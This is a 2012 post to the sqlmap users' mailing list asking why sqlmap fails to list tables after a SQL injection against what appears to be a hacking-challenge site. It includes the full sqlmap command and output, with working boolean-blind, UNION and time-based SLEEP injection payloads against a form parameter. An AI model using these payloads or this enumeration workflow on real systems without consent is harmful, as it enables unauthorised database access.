[sqlmap-users] I am not finding table names from db names with sqlmap..is there any idea?
Brought to you by:
inquisb
From: Fırat C. E. <fc....@gm...> - 2012-04-27 12:11:23
|
Hi, is there anybody help me about a mysql boolean based sql injection exploitation with sqlmap..I found database names with sqlmap but I didnt find any tables from any database..I dont want to use for finding table names from a common table names file.. So, how can I take full table names with sqlmap or another tool..I tried havij but I can not find any table name with it ..is there any idea ? I had this error on sqlmap : *./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D mysql --tables* * * * sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool* * http://www.sqlmap.org* * * *[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program* * * *[*] starting at 15:01:42* * * *[15:01:42] [INFO] testing connection to the target url* *[15:01:43] [INFO] searching for forms* *[15:01:43] [INFO] sqlmap got a total of 2 targets* *[#1] form:* *POST http://level4.hack2net.com:80/projects.php?form=ara* *POST data: kelime=&tur=1&aramayap=Ara* *do you want to test this form? [Y/n/q] * *> y* *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank fields detected): * *do you want to fill blank fields with random values? [Y/n] y* *[15:01:50] [INFO] using '/pentest/database/sqlmap/output/ level4.hack2net.com/session' as session file* *[15:01:50] [INFO] resuming injection data from session file* *[15:01:50] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file* *[15:01:50] [INFO] using '/pentest/database/sqlmap/output/results-04272012_0301pm.csv' as results file* *sqlmap identified the following injection points with a total of 0 HTTP(s) requests:* *---* *Place: POST* *Parameter: kelime* * Type: boolean-based blind* * Title: AND boolean-based blind - WHERE or HAVING clause* * Payload: kelime=38' OR '38'='38' AND 5116=5116 AND 'Hbnf'='Hbnf&tur=4&aramayap=Ara* * * * Type: UNION query* * Title: MySQL UNION query (NULL) - 5 columns* * Payload: kelime=38' OR '38'='38' UNION ALL SELECT CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), NULL, NULL, NULL, NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara* * * * Type: AND/OR time-based blind* * Title: MySQL > 5.0.11 AND time-based blind* * Payload: kelime=38' OR '38'='38' AND SLEEP(5) AND 'mlpI'='mlpI&tur=4&aramayap=Ara* *---* * * *do you want to exploit this SQL injection? [Y/n] y* *[15:01:56] [INFO] the back-end DBMS is MySQL* * * *web application technology: PHP 5.3.5* *back-end DBMS: MySQL 5.0.11* *[15:01:56] [INFO] fetching tables for database: mysql* *[15:01:56] [INFO] fetching number of tables for database 'mysql'* *[15:01:56] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval* *[15:01:56] [INFO] retrieved: * *[15:01:58] [WARNING] unable to retrieve the number of tables for database 'mysql'* *[15:01:58] [ERROR] unable to retrieve the table names for any database* *do you want to use common table existence check? [Y/n/q] * Thanks a lot.. -- *Fırat Celal Erdik Security Specialist, Certified Ethical Hacker - C|EH** http://www.networkpentest.net* |